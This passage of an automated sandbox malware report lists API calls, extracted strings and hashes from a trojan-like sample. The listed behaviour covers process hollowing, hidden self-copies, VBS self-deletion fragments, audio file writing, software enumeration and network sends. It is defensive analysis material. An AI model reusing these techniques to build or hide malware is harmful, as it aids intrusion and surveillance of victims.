                                      • API ID: File$Find$CreateFirstNext
                                      • String ID: H"G$`'G$`'G
                                      • API String ID: 341183262-2774397156
                                      • Opcode ID: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
                                      • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                      • Opcode Fuzzy Hash: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
                                      • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                      • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                      • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                      • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                      • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004087A5
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstH_prologNext
                                      • String ID:
                                      • API String ID: 1157919129-0
                                      • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                      • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                      • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                      • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                      • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                      • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                      • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID:
                                      • API String ID: 745075371-0
                                      • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                      • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                      • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                      • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0040784D
                                      • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                      • String ID:
                                      • API String ID: 1771804793-0
                                      • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                                      • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                      • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                                      • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: A%E$A%E
                                      • API String ID: 0-137320553
                                      • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                      • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                                      • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                      • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                                      APIs
                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                        • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                                        • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                                        • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateInfoParametersSystemValue
                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                      • API String ID: 4127273184-3576401099
                                      • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                      • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                      • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                      • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                      • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                      • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                      • ResumeThread.KERNEL32(?), ref: 00416773
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                      • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                      • GetLastError.KERNEL32 ref: 004167B8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                      • API String ID: 4188446516-3035715614
                                      • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                      • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                      • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                      • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                      APIs
                                      • _wcslen.LIBCMT ref: 0040B882
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                      • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                      • _wcslen.LIBCMT ref: 0040B968
                                      • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                      • _wcslen.LIBCMT ref: 0040BA25
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                      • ExitProcess.KERNEL32 ref: 0040BC36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                      • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                      • API String ID: 2743683619-2376316431
                                      • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                                      • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                      • Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                                      • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                      • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                      • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                      • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Write$Create
                                      • String ID: RIFF$WAVE$data$fmt
                                      • API String ID: 1602526932-4212202414
                                      • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                      • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                      • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                      • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                      • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                      • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                      • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                      • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                      • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                      • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                                      • API String ID: 2490988753-3443138237
                                      • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                      • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                      • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                      • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$EnvironmentVariable$_wcschr
                                      • String ID:
                                      • API String ID: 3899193279-0
                                      • Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                      • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                      • Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                      • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                      • _free.LIBCMT ref: 0044E4DF
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 0044E501
                                      • _free.LIBCMT ref: 0044E516
                                      • _free.LIBCMT ref: 0044E521
                                      • _free.LIBCMT ref: 0044E543
                                      • _free.LIBCMT ref: 0044E556
                                      • _free.LIBCMT ref: 0044E564
                                      • _free.LIBCMT ref: 0044E56F
                                      • _free.LIBCMT ref: 0044E5A7
                                      • _free.LIBCMT ref: 0044E5AE
                                      • _free.LIBCMT ref: 0044E5CB
                                      • _free.LIBCMT ref: 0044E5E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID: pF
                                      • API String ID: 161543041-2973420481
                                      • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                      • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                      • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                      • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                        • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                        • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                        • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                      • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                      • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                      • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                      • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                      • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                      • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                      • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                      • Sleep.KERNEL32(00000064), ref: 00411C63
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                      • String ID: /stext "$$.F$@#G$@#G
                                      • API String ID: 1223786279-2596709126
                                      • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                      • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                      • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                      • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID: pF
                                      • API String ID: 269201875-2973420481
                                      • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                      • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                      • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                      • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                      • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                      • API String ID: 1332880857-3714951968
                                      • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                                      • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                                      • Opcode Fuzzy Hash: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                                      • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                                      APIs
                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                      • GetCursorPos.USER32(?), ref: 0041B39E
                                      • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                      • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                      • ExitProcess.KERNEL32 ref: 0041B41A
                                      • CreatePopupMenu.USER32 ref: 0041B420
                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                      • String ID: Close
                                      • API String ID: 1657328048-3535843008
                                      • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                      • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                      • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                      • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      • Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                      • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                      • Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                      • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                      APIs
                                        • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                        • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                        • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                        • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                        • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                      • ExitProcess.KERNEL32 ref: 0040C57D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                      • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                      • API String ID: 1913171305-2600661426
                                      • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                                      • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                      • Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                                      • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                      APIs
                                      • connect.WS2_32(?,?,?), ref: 004048C0
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
